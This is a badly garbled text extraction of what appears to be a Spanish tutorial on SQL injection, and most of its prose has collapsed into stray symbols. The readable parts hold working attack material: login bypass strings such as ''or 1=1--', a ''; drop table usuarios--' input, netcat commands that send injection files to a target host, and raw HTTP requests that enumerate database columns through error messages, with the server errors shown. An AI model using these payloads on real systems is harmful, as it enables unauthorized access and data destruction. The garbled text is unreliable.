Añadir a la recogida (s) Añadir a salvo
  1. Ninguna Categoria

Técnicas de SQL Injection: Un Repaso

Anuncio 
!
!
#$%&
"
'
" * +"
(
,# .
/
"0#$%
'
"
, *
) 1 % )" + !
"
, *
, ")
- **
2 #$% '
"- " "
3 #$% 4
)
?
@
B
C
) 5
,
! )
%"
"
5 "
67"
* 8*
"
. 5 9 ", #
:)
*
*
#.
8<
+
"
" )
>; ) 5
4 '
" ;
4 #
!
4 ! ', *
#$% 4
: "'
"
' "
"A
"
*
"+%
"'
; "
A " "' ) "
5.
"
""
) " " "
! 6 . "
#$% 4
+ ;7
"
.
/
;
" =
"
"
" .>
", "
"
" 8<
" "
#
,
"
!
,
"
"
"
"
"
#
8
"
)4
" 7
# )
"
"
+ =
)
& " +
. "
!
.
7
6
&
"
"+
"
9
&
"
" "
. "
( "
&
D
"
9 &
"
"
(
*
6
+
*
"
6
.
"
" 6 ( ""
" 4 ""
"
7<
"
) "
"
" "
"
&"
"
"& "=
. (( #
+
2
;
" "
"
*
5
"
.
"
6 " .
"
"
" 6
"
)
&
"
(
"
")
)
* 9
"
7 " 6 (&
. 4 #$%&
" "
" "
" *
"
9
"
"
$
!% & '
5 *
"
D
C 2
.
6 " .
'
"
* 9
"
" 9 ( " ) 4
&
"
* )
4 "
"
%
#8$ 8%
*
*
&
!
% .
. =
4 " " "
"
+&
"& +
"
D "
"
"
&
.
"
)
" "
*
(
&
"
"
"
)4
"
) 4 )
6
9
"
( )
"
+
8 . "
6 7 "
6 " . "&
*
9
"
&
"
>#
"
"
) "
"
9
. 4 #$% " 6
E#+) " & :
+
"
51#
CB@ +
"
9
"
.& 9
+" " ")
"
*
"
)
"
. 4
"& 9
"
") " "
.
"
4
"
. 4
+ % . . >
*
6
D
C &
#8$ 8%
#$% E#
$ + % . . F
$
" D "
,-
&
9
9
+ =
*
<F
#: * "
" 6"
.=
.
"
. 4
4
"
6 "
. 4 "
"
"
*
CB
" #$%BC + #$%C &
"
6
"
"
"
6
.
"
"
"
"
"
+
(
"
&
"
"
)
6 "
"
>!
#$%>
"
9
4 "
) )
"
6
"
" . "
4 " "=
9
"
#$%2
.
6
"& 9
"
+
6 6 "
6
. 4
(
) * # +,
$ ( " " "
"
" ) "
"
" 9
- +
" *&
) 4 ) 4
"
"
9 " =
" "
=
,:# !
9
"&
9
" *
"
& " )
) 4
9 "
6 "
2
G
" E,
.
*
&
" 6 "
"
"
"
""
F&
" *
) "
D= " " )
" ) :# & " "
" )
"
)
"
.
" 6
"
!'
"
"
%51
3
5
) &
( ) "
"C &
9 "
& )
9
. )
"
6"
9
4
& "
9
" )
*
" . =
"
6 6 "
# &
)
" 6 "
2F
" 9
" *
9
"
)
:# 2
%
"
)
7
" 9
" ") "
) "
"
9
"
8
""
:#
"
6 &
6
'
"
9
&
- "
*
"
"
*
"
, "
"
6 "6 "
"
#$% @
&
"
"
.
"
"
"
"
"
.
"
" "&
"
"&
"-
.#
'
*
"
/
" .
) =
.
!
0
9
6 "& +
9 6
"
"
"
" .
)
*
=
9
"
6
6
"
#+) "
:#
+
G
+
9
"
" 1;& +
" *
0 "
"
" * #$%& " *
9 ( " .
CC?
"
"9
.
)
"
#0#$%& ) 4
&
"
"
F&
"
"
"
6 "
#$%
.
&
"
" *
,
)
-
6 "
)
" 1;> H "
D CC2
"
&"
"
G
&
#+) "
5
)=
" "
"
.
E#$%
6 "
"
9
.
"
"
)
) "
" 1;
67"
"
CCB
.
)
9
9 " )
" - "
9 "
. "
" .
" "
9
D CC
=
" * #$% # 6 3 *
( "
"
) >
( =
& +
9
=
( )
.
"9
"
.
6
, "
G
&
"
" *
=
"
"
,
"
:#
" )
7"
"
"
&"
*
*
"9
" *&
2
G
" 1;
" .
"
9
"
"
E!
9
) 4 =
"
" * #$% " 6 "
&
"
I)
&
"
" )
.
( #$% # 6
&
"6
)
"
"
&
"
" "
"
6 4 ""
&
9
"
"
"
"
4
6
" "
=" "
*
9
9
#$% # 6
& "
" "
"
"
""
<
" *&
*
"
"& "
" "
"
.
+
) "
"
?
# )
4
)6
")
& *
" "
) =
+
"
" #$% )
" &
"
"
) "
"
. 9
.
&
"9
"
"
&
"9 &
"
)
"
) 4
"
E' "
" "
"
#0#$% # 6 & 9
"
)
" ) 4
.
&
"
+
"
J
6"
8
6
"
"
"
)
&
"
"
.
"
"
.
"
.
)4
"
F
%#
"
&
"
6 &
.
"
"
" #0#$%& "
" "&
9
8
"
>#5> +
"
8
)
<
"
#$%
9
"
#0#$% 9
" 9 "
4
"
"
5
E8"
# 6 &
5
) "
6
+ )
"
.
=
<
<
6 "
"
""
&
"
9
(
) "
)
+*
"
"
"
"
" .
) " "
" I
+
) 4
&
"
&
*
"
6
#0#$% # 6 &
""
6
"
"
1 % )"
F
+ =
"
*
"
"
"
*
"& ) = "
4 "
"
) 4
"
"
"
"
"
)7
&
" E#51& 5
; M& !N #!N& ;'!&
(
9
" 9 "
"
& "
" " ;'! ! + 1
!
"
&
"
"
+
F
*
4
4
9
"
"
"
"
"
"&
.
"
"
)
" )
"9
"
9
.
"
= &
9
(.
"
"6
4 " EIF
"
) "
" "&"
6 . "&
"
4
"
"6
"
".
" *
.
"
> > EKKF
"
"
"
"
6
7
"&
+ " 6
""
"*
( 1
( * $#
#0#$%
6
L"&
.
"
"
"
6
#0#$%
"
#5 "
"
"
<
"
"
5
") "
" "
)
;
"
"
"
"
"
9
"
&
" 6
;'! 332
.
"
"
" 9
"
#0#$%
.
)9
#0#$%
@
8
*
6 "
6 #$% E!
4
7
& "
6
"&
"6
)
)
" "
=
#5
"
9
+
""
> >F "
"9 6
#$%
)7
"&
;:,:#
.
"
"
" D "
"
.
"
"
"
"
"
"
"
"
) "
.
" *
"
"
1
+ (
&
,#))
;
, 6
% *
#$% # 6 > O#$% # 6
"*
"
- ** "
"
" > 8"
9
"
" *
6
P
&
,!
"
)
<
" "6
"
"
.
"
"
+"
"
")
9
5
"
"
"
"
"
)
!
" Q
" Q
" Q .
9
"
<
"
"
"
"
&
"
"
) **
#$%&
>
M . 8< " G
) **
" )
"
>" 6Q
* EF>
""
Q M9
Q
"
Q <
Q" "9 "
Q"9 .
6= "
&
"
")
")
" < =
> E #-1 B303B 022CB0@F
)
<
<
<
<
<
<
)
"
6 "&
"
"
"
"
"
# )
*
"
"
9
*
"
#$% # 6
9
)
". *
>;
! *
" "
, ")
1: < "
" + "
"
"
"&
"
"
+
"
>
M . 8< "
" 9
Q
Q"
Q "
Q
" "
6
"
<
<
<
<
+
"
6)
-"""
" Q "
" Q
"
+
+
+
""
"
>&
"
G
(
"
"2
% &
;
,
"
"
"
6
"
"
)
& #$% "
*
" <"
"
"
:
& ; " 0#$%
"& < "
.
"
& "
" "
.
"
% &
/ 51;
8H:R8
,81S
+%
+
++
+
"&
"
"
"
(
" "
" "
"
6
.
.# .
&
6 " ) "&
" =
) " =
"
" ) " . .
*
"
"
*
#!
.# .
." "
"
"* .
.
"
."
"6
" "
."
(
"
&
) "
"
J
*
"
*
"
"
"9
) "
"
"
"+
"
)
) "
"
"
*
(
"
*
"
%! # #!
(
A :
G 8 8
(
(
/ : ! -S
5H 1/
: ,8 -S
"
&
.
(
.
6
"
.# .
+ )
"
"
*
!
(
,8%8;8
""
%
+
(
!,5;8
%! # #!
% "
"
" "
*
)
1#8 ;
5
" E!%0#$%
" *F
"
(
+
"
"
"
"
(
8
5%;8
#8%8';
"
(
(
(
% &
' 85;8
, :!
% &
. 4
(
(
"
*
"
"
*
" ." "9
"
.
"
< "
)
" ."
" 6
"
"
"9
)
" 6
"
" ." ""
"
" =* "
9
) " "*
.
" ." ""
"
"
*
"9
B
3
% &
T
U
TU
TV
UV
V
-8;G881
% R8
1
+
,"
.
.
9
+
(
.
*
"
9
9
9
9
6
6
"
(
(
"
*
."
"
) "
"
4 & !
SELECT * FROM Tabla;
E8"
"
6 6
"
"
"
."
"
) >; ) >F
UPADTE Tabla SET password = 'Juajuajua' WHERE user =
'admin'
E8" "
( =
""
"
&
6
F
5
4
"
)
&
"
"
"
"&
"
"
"
9
. 4 #$%& "
4
"
" !
4
4
"
# )
"
&
"
6
"
&
9
6
"
"
#$% "
"
=
& "
"
"
"
"
""
"
4
"
"
"
+
#$%
&
. *
" )
&
"
&
7
9
"
+
4
"
*
*
"*
& "
"
6 " 9
+
.
"
9
")
"5
#
#
67
"
H
)
")
" 9
=
"
&
.
(
.
"
'
*
"
.
8
&
>&
"
"
"
9 "& " .
" >5 9 "
9
*
6 &
"
"9
" #$% )
"&
"
C
"
6
"
" )
" " =
# )
&
)4
<
6
"
" )
" .
*
" *
" "
"6 "
"
"
") " " "
" 6
"
9
.
" *
"
"
"
!
.
4
"
"
. 4
. "
)4 6
" &+
"
"
"
) 4
*
*
( 6!
# )
) "
6
&
"
"
9
8"
"
4
#$%&
5
+
4
>#$%
#0#$%&
" *
"
"
"".
"
"
" 8
"
" =
"
*
.
9
*
+
9 .
)4 6
"
4
>
"
"9
&
)
" "
.
J
"
"
&
9
<
(
*
4
"
8"
"
"
"
"
9
+
&) 4
"
7
"
.
&
"
"
"
&
"
#
! 6 . "
#$%
6
"
"
" 7
.J
.
&
"
)
.
"
"
0 8*
"
05 9 ", #
0 :)
*
0 8<
+
0'
" ;
,
J
#
9
"
" !
"
"&
& "
6"
<
)
9 "
5
*
"
"
6
+
6
9
)
7<
". *
"
6
"9
9
. "
&.
"
"*
" ) " "
"9 6
"
+ ""
) "
"
"
" 6
" )
"
4! $ (! &
9
"
" 6
.= "
"
"
"
"
)
"
"G
"
"
"
5#!
=" " 9
&*
"
<
"
"
" 6
"
<
"
* "& "
".
*
"
" =*
*
# 6 "
) " "
" #0
G
"
9
*
"
"
( "
7<
"
"
"
8
9
+
6
"9
(
"
8"
9
"
= "
"
&
"9
"
"
)
"
9
"
)
6"
"
"
) "
&
" "
*
" D
+
:M&
"
" " "
"
"+
8
"
"
"
"
)
&" "
6
"
"&
)
"
)
6 (
&
"
=
"
""
"
=
"
"
6
)& "
) "
" 6
"
"
"
9
"
" : %
*
"
)
"
&
+ =
) "
"
"
.
.
<
"
.
.J
6
"
"
" *
9 "
"
"
"
&
" "& "
)
"
)9
"
"
)&
" 6
"& + " )
. "
"
)
) M.
"
*
"
*
*
6
"
"
"
6
""
"
"
"
"
"&
)7
;
)
+ =
6
6
" )
) 4
"
(
"
6"
) "
"
.
"
"
"
*
.
) "
<FORM action=logon/logon.asp method=post>
<input type=hidden username=_UserName password=_Password>
</FORM>
8"
* .
9
+
"
J
.
"
"
"
"
. " "
. &) "
" 6
"
"
5#!
"
"
F 8
+
6
"
"
"
&
(
"
. " "
.
5#!
) "
" E!
*
; %& 9
) "
"& .
; % + 6 6
&
*
&
)
"
. " "
*
6
+
. "=
<
*
) )
select * from users where username = _UserName and
password = _Password
5
*
"
)
9
"
"
"
6 "
6 6
"
" "
"
.
"
"II )
&
"
4
(
"
&
"
"= +
"
"
" .
&" .
&
"
&
+
) )
"
"
<
"
%
"
)
"
*
"
"
http://www.objetivo.com/libreria.asp?edicion='Noviembre'
!
"
" & "
"
"
" ) +
)
"
"
L1 6
) L " "
"
"
) 4
.
"*
" "
"
%
9
"
=
+
)
"
"
"
"
.
"
.= EN,F
)7 " "
6
.
5#! 9
8 "
" &
+
) )
.
)
"
"
"
. 9
*
6 " 6
.
"
select * from numeros_anteriores where edicion =
'Noviembre'
"
#$% >
"
&
"
6
9
=
>&
.
&
"
) "
" "
+
"
"
9
.
& "
"
" "*
"
"
"
"
*
.
"
)
7
"
"
+ " +
"
9
+
9
) "
#$%
5
6
"
&
E'
"
" "
F
#
) "
"
" !
"
% L E'
#
"
4
&"
+
9
"
)
*
+
F "
"&
"
"
""
" "
) 4
"
" )
L
"
")
+
" * #$% # 6
"
"
*
*
6
9
9
"
9
6
"" "
)
#$%
9
*
"
(
"9
4
(
" 4
&
(
"
.
H
"
"
=
.
"
"
"
" +
&
"
"
"
"
)
"
Usuario : An'gel
Password : 338xD
select * from users where username = 'An'gel' and
password = '338xD'
.
select * from numeros_anteriores where edicion =
'N'oviembre'
8
) "
"
.
" " 9 "
#$% # 6 & " 9
.
"
"
" .
9
" ""
&
"
(
""
"
9
"
"
"
"
+
username = 'An'
edicion = 'N'
% . & ".
"&
"
"
5
"
)
9
"
""
8
"
9
"
#$%& *
"
" = "
&
.
6
"
67"
" 4
"
"
+
&
"
.
"
4
"
9 9
"
#$% # 6
( &
&
". *
"
"
L5 L + L1L II
9
.
"6"
) "
"+ "
"
*
"
"
(
9
+
*
9
6
"
"
.
"9
.J
6
"
*
%& "
" "
&
(
* "
)
"&
.
"
8" "
"
) "
8
"
*
"
+
A
*
6
"
") " "
"
"
"
6 &
6 6
9
"
.
) =
& 9
"
"
)7 " ".
9 "
7
"
"
# 6
" . #$%
(
(
6
)
"
E84
"
)4
.
"
.
& " 6
9
" " "
+
) 4
" "
" . &
"
6 "&
" *
"
9
6
" "
&
) )
"
"
)"
"
"
"
"
"
.
. "
.
"
.J .
"
"
"
&
7<
)
"
&
<
"
4
9
)7 & "
"
"
" 6
"
"
"
?
>8
# 6
>F
"6 "
9
+
#$%
" 6 )
" " 9
"&
9
) "
" ) 4 + "
(
"
' " '
&
"
) 4 >
. #$%
> EH
B
*
" +
"
"F
9
"
"
*
.
".
"
<
2
1
$
%
&
'
+!
0
(#)*
,
-.
,
/
%
,
,
-
123
% &
)
"
&
6
9
*
&
)
+
"
(
"
*
" I
"" "
) "
"
+ =
"
&
"9
""
"" .
)4 6 6
6
"
"
!8 (
.
" 7
"
#$% 4
.
"
9
" " "& 9
; %& 5#!& & "
" " 6 ( 9
# 6 '
" 9
"
)
"&
6
) & "
&
4
& .
&
6
" "*
"
)
& " > 6
* "6 & " " .
9 &
4
&
) "=
8
"
*
" &
) "
"
)
.
"
*
.
.
>.
. >F
" > )
7
"6
#
"
"&
" "& +
"9
.J ) "
E!
" ."
>
>% "
'
">
"
) "
"
"
"
9
"
" "
)
9
;:,5 *
" " 6 (
!
"
(
&"
.
"
=
&
"
.
.
"
"
"
"&
)
"
"
" " "
" "
" "
"
9
7
= "
" "6
"
)
" " * " *
"
)
6
& "=
" "
"
"&
.
"
"
+ =
"
.
" 7
9
.
&
6
" # )
& 1: )
)
"
"
&
"6
"
"
) E8"
"
" )
6 "+
.
F
*
+ =
)
. "
"
"
"
. "
"
"
<
#$%
"&
.J "
"
+
) 4
*
" EH > % "
'
">F
" >
"
9
& "
6
" " 9
)7
">
" )
) "
"
6
"
6=
"> "
*
*
"
"&
+J
" &
.
"
. " =
) "
9 "
3
$
(!
6)
"
"
"
"
"
"
/
!
"+
"
" "
* "
6"
"
H 7
"
"
! "
*
=
"
.
"&
"
"
.
#$%
""
"
. I) &
E> L >F
*
" )
6
"
+
"
=
(!
"
.J
"
"
"
"6"
+
"
9
*
"
.
" " "
"
"
; % 5#!&
*
"
"
"
"
9 6
"9
"
"
" 6 "&
. "
# 5 : + !5##G: , "
"
.
5#! 9
)
"
+
6
#$% ; ) 7
=
"
9 *
"
" 6
#$%
"
<""
.
" "
" 4
"
"
6
+ =
)
*
) &
3(
"
& #
" : 0% &
"
" "+
"
.= & ! . "
" " D "
9
6" +
) " <
"
"+*
" " "
"
&
9
4 4 4
)
"
.
"
4 " "
"
"
" "" "
" )
"&
9
"
"& "
. "
"
6"
*
.
5 "
"
"
" &
)
)
*
"&
)
. "
"
+
* "&
" " )
6 " "
"
"
*
"
.
9
.
!
6
"
"
. *=
"
"
=
"
"
"& : 0%
.=
""
$
! .
86
,
*
"
"
"
) &
"
4
8"
"
* .
<
=
"
)
. *=
---- Extracto ------------------------------------------<FORM action=ingreso.asp method=post>
<TABLE cellSpacing=1 cellPadding=3 width=440
bgColor=#ffffff border=0>
<TBODY>
<TR bgColor=#ff0066>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
?
size=2>Nombre</FONT></B></TD>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
size=2>Clave</FONT></B></TD></TR>
<TR bgColor=#ffcccc>
<TD><INPUT name=USERNAME> </TD>
<TD><INPUT type=password value="" name=PASSWORD>
</TD></TR>
<TR align=middle bgColor=#ff0066>
<TD colSpan=2><INPUT type=submit value=INGRESAR!
name=SUBMIT>
</TD></TR></TBODY></TABLE><BR><BR></FORM></TD>
<TD vAlign=top align=left width=10> </TD>
<TD vAlign=top align=left width=140>
<TABLE cellSpacing=0 cellPadding=0 width=140 border=0>
<TBODY>
---- Extracto ------------------------------------------!
"
9
.
4
*
5#! E!
"9
5
) &"
9 6
"
"
" "
)
.
(
"
=
" &
) 4
&
" F
. "
(
; %
. " " &
" " "
"
"
"
9
*
+
9
"
#$% " 6
"6"
"& +
"
"
"&
"
)
"
select * from users where username = 'Angel' and password
= '338xD'
!
"
"
9
) "
(
"
"9
"
+
(
""
.
"
)
*
<"
6
9 =
6
)
)
"
9
*
"
+
"
)
*
4
=
"
"
#$%
"
"
" D
.
"
"
I :M&
"
+
'or 1=1—
"
6
"
.
"
Usuario : 'or 1=1-! ""
L
V W
A 47
"
"&
.
9
=
"
.
)
select * from users where username = ' or 1=1-- and
password = ' or 1=1--
+
@
1
9
"
""
.
9
"
1
(
"
6 6
+ =
<"
"
"
"
" "
6
"
"6
E
""
"
"
>: > 9 "
"
)
. "
"
&
F&
,
0
4
Usuario : 'OR''='
Password : 'OR''='
5
4/
'
)
" > "
# )
"
&
"
">&
"
#$%
"&
.
+
"
<
"
(
7
" .
+
&
(
#.
""
+
"
6 .
"
4
)4
.
"
& "
"
&
"
6
+
> 00 > E, )
&
#$% 9
.
" "
6 &
.J
"
& "
)
"
6 "
&
6 4 .
F
"
" "
9 6 .
9
.
"
6"
"
"
"&
" " "
*
"
/
" .
"
>5
>
9
>
<"
> "
=
Usuario : Admin'-Password : 'or 1=1-8
= &
"
9
"
"
=
"
" "
.
select * from users where username = 'Admin'-- and
password = ' or 1=1-#
.
8
E'
6
"
*
"= + " .
"
&
"6"
"
9
4
) 6
F
"
"
+
&
) )
+
"
"
">L>
" + > 00 > E, ) /
F
"
< "&
" )
"
"
"
" > "
"
.
">
"
) 4)
5 "
#$%
6 . "
"
"
#
'
*
+ =
$ 7! .
"
+
" )
"
"
.
"
"&
9
6
"
J
"
"
*
"
) 4
"
" 9
6
" *
"
6 .
.
""
5
6
!
"
9
"
>
"
9 "
<
+
"
" .
""
"
6
"
&
.
"
)
"
9 D
"
(
)
* "
)
)
"
"
*
"
<
"
" )
9
" .9
+
&
6
=
"
"
)
) "&
"
"
.
". *
1
"
*
"
) "
6 " )4
) "
" )4
"
"
8
". *
6" "
"
+
%
#
#$% # 6 &
+
"
&
" 6 . "
" 6
& "
>
"
& " ) +>
>
" "
) "
" #$% # 6
"
" " "
"&
"
"9 "
.
"
"
"
)
"
9
> 9 "
+
*.
" "
"
"
E'
+ <
" F& " "
"
"
"
" " .
&
. 9
"
" ) " "
"& +
" 9
"
"
&
4
&
"
6
"
" "
"
" 6 " "
"
& " 6 "
4
& "
+ *
"
" )
"
<
6 . &
" "
" .
"
'
;
""
6
##$%#8 H8
<
>< Q
)
"
)Q
"&
"*
. & "
*
"
$ 7! .
"
)
#
"
" "
17 !
"
".
& ) 4
! "
6
"
6
"
" *
"& +
" *
) "
"
8
4
.J
" " "& "
" " ) "+
B
. 6 9# +
&
% " 9 " , .
# 6
&
"
6"
"
"
"
" E8 "
"
) "
=
"&
4
"
(
+ ( & F
5
9
*
6
9
"
"
"
6
" &6
9
4
" "
)
"
"9
.J
4
"
&
.
" " 6
.
&
+
M
#$%&
"
"
&"
" " D "
" E' =
" 5
9
" 9 "
.
"
" 6
*
"
&
"
=
8
"
.
"
"6"
"
. 6 9
J
"
" "
)
&
"
"
=
4
&
F
&
*
" 9
*
&
&
Usuario : '; drop table usuarios-Password :
#
*
EH
"
) )
)
&
'
6
"
*
>8*
.J
&
9
7
"
> "
&"
"
"
"> "
! 6
&
"
*
+
) (
, # "
" )
"&
"
"
"
"
&
"
6
&
"
"9
)
. "
>F &
"
. "
9
*
"
"
9
"
6
"
"
5"= +
6
"
(
&
.
) = "
&
+
1
$
%
+
67
)
: 3(
! ) )
7
"
) &
#$%
(
4
"
D
# )
"
"
"
"
.
%
& 4/
.
$
!
#&
" *
"
"
"
"
(
& "
" ")
" 9 )
" :,-' :%8 ,4 "
#$% # 6
.
"
9 &
&
"
" "E
)
"6
&
+
"
.
"
"9
"&
"
)
. "
) "
"
) "
. 7<
"
"
&
( = &
9
"
"
*
F
C
"9
1
"
"
"6
) "
8
&
"
"
"9
) "
! "
"
"
" D
6
6") "
. "
&" "
&+
" 4 " "
"
+
"
6 ("
"&
+*
"
*
.1)
8
6
+
"9
*
" "
" 6 (
".
> L > E'
*
"
"
4
#
9
"
6
"
"
<
"
"
"
&
"
"
F
"
& 6
"
"
)
"
" .
Warning: SQL error: [Microsoft][ODBC SQL Server
Driver][SQL Server]Unclosed quotation mark before the
character string '\')'., SQL state 37000 in SQLExecDirect
in php/db_odbc.inc on line 61 Database error: Invalid
SQL: Select * from usuario where (usuario.login='\'')
ODBC Error: 1 (General Error (The ODBC interface cannot
return detailed error messages).) Session halted.
-
&
6
:)6
%
"
E
2 !
3 8
?
.
1
"9
*
" <
" * #$%
<
) "
" "
>
)Q )
>F
"
*
)Q )
&
)
) "
"
(
" "
" "> . >
&
"
"
:,-'
"
" 9
"
6 +
:,-' 8
"
)Q
.
"
"
9
6"
"
"> "
.
>
*
)
3
%
)
010.8#* - "3.9$
(")-#)
123
:;<<
9
+
----- Fragmento ----------------------------------------<?php
/*
* Session Management for PHP3
*
* Copyright (c) 1998-2000 XXXXXXXXXXXXXXX
([email protected])
*
Modified by XXXXXXXXXXXXXXXXXXXX
([email protected])
*
* $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $
*/
class
var
var
var
var
var
var
var
var
var
DB_Sql {
$Host
= "";
$Database = "";
$User
= "";
$Password = "";
$UseODBCCursor = 0;
$Link_ID
$Query_ID
$Record
$Row
var $Errno
var $Error
=
=
=
=
0;
0;
array();
0;
= 0;
= "";
----- Fragmento ----------------------------------------6
"
"
. &"
*
*
A
*
"
)Q )
"
"
"
>" " >
" 6
) " X " + X! ""
"
9
"
( " " "
. "
"6
&
.
" 6
4
*
. 9
& " "& 9
*
9
9 6
"
" + 6
&
"
" .
"
"
.
"
"
<
9
"
" )
E8 "
"
F
:
) &
*
/
:M& 6
"
"
* 6
"
"&
*
+ "
"
"
+
. &
" 9
4
.
6
"
"
"
"
"
"
"
=
#$%&
6 "
" 6
"
) "
"
"
!
9
+
#$%
) "
)
9
" "
4
)
"
) "
"
.
"
*
"
+
6
+
8
"
"
"
(
6
"
7
"
#$%
"
4
"
&
"
(
&
"
"
! " 9
6 4 6 "
" )
"
) "
"
#
"6
"
"&
"
"
&
J
*
" "
) < 9
"
"
"
(
6
+)
"
"
"
9
"
"
B
"
*
"
.
7
"
9 D "
<
&
"
" 9
" 6 " " "
;;!
"
)4 6 & "
6 "
<
&
&
".
*
"'
"+%
) 4
F
9
7
"
<
""
"
"
"
" 6
% E8
"'
".
"
.
" 9
"
;;!
M
"F&
E5 .
. =
6
" "&
"
6 &
"
*
"
(
"
6
nc -vv www.objetivo.com 80 < sentencias.txt
'
'
"
&
(
8
9
)
"
"
8" *
+
+
" *
" **
*
F&
.
" D " *
"
"
;;!
*
E8 "
" * # +1 &
"
.
"
) )4 6
. "
" E5 .
) " " " F& "
6
"
"
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 34
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Angel&txtPassword=Angel
Y
Y
Y
H
. "
>! ""
>
Y
Y
H
*
-
&
"
! "
" "
*
(
*
8
"
.
. "
9
""
<
6
"
"
"
+
&
6 6
" ) "
!
"
"
"
*
9
"
7
) 4
!:#; )
<&
4
"
"
.
" .
+
)
"
)
> L > E'
9
"
(
6
"
"
F
&
*
" 6
"
)
"
"
"
E 6 .& .
6
""
(
>
" >
">
#$%&
" *
6
9 #$% E
4
:%8 ,-F )
"
"
"
6
" "
"
"
>
"
)4
H 6
(
"
"
> "
.
" .
" **
) "
9
)
*
"
4
!:#; 9
> "
"
"
<
"
6
6
" )" 6
6
(
"
)+&
)
" #$% 9
F
"
' " "
" *
"
9
< &
"
4
"&
" 4 " *
6 "
" "
" 6=
"
"
"
*
(
6
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 46
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27having+1%3D1--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
L 6 . V 00 E8
Z
6 .[ Z2, 00F
"
2
1
.
$
3
"
=
)*1(
5*'>
!
"
"
)
"
)
"
"
% )
9 6
6"
"". " "
">
>
"
"
"
"
6
!
\
]
5
!
[
0
^
Q
9
6=
"
6
"
"
(
"
& +6
(
9 "
9
"
)
"
Z 0
Z?'
Q
4
<& "
"
9
"
"
!
6"
9
"
;;!
"
Z
Z2Z25
[ Z
Z2,
Z '
Z B
Z C
Z28
Z2'
"
- M# "
"
9
"
"
8
*
"
"
"
4
=
"
!:#;&
"
+
'
#
!
+'
, "!
"
8"
#.
.
'
! 7 ""
! 7 ""
+
OO
V
&
E
F
U
T
:MK
6
""
" " "
(
6
6=
"
&+ 6
"
"
"
)
"9
"
nc -vv www.objetivo.com 80 < Injection.txt > result.html
-
6
"9
)
!
"
"
"
*
"
H
"
9
6"
"
"
9
9
4
"
*
&
"
""
"
.
"
"
+
"
"
+
"
9
.
"
" *
"
4
"
> 6 .>&
"
& "
"
7
)
3
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UserID' is invalid in the select
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
! *
KK "
"
" 4 "
)
) "
E # 5 :#F& "=
"
5
"
"
H
9
6 6
"
"&
"
6
"
)7
"
9
&
&
"
=
:,-'
(
)
*
) &
" *
< +
(
"
"
"
"
"
6 !:#;
4
"
" )" 6 9
#$% # 6
" 6 6
*
"
"
.
" E " ,F
*
"
"
)
.
= &
*
"
# 5 :#
)
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 71
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx
=COUNTRYNAME=Argentina
txtUsuario=%27group+by+usuarios.UserID+having+1%3D1-&txtPassword=Angel
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
H
+
L.
)+ "
" " , 6 . V 00
% .
"
4
6
"
=
&6
"
".
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UID' is invalid in the select
?
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
6 (
"
" 6 (
+
"
"
#.
,
)
"
"
> . " >
> 6 >
"
&
" 9
"
# 5 :#&
.= & "
"
" 9
" )
"
>.
"
)+>
"
"
# 5 :#
"
"&
"
+
8" " =
"
> 6 .>
" )
,
"
)
*
"
"
(
"+
"
*
'group by usuarios.UserID,usuarios.UID having 1=1-#!
!
*
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Nombre' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
*
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre
having 1=1—
#!
!
*
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Email' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
@
*
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre,
usuarios.Email having 1=1-#!
!
*
HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date:
Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved
Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23
GMT Connection: close Location: PaginaPersonal.asp
Content-Length: 139 Content-Type: text/html Set-Cookie:
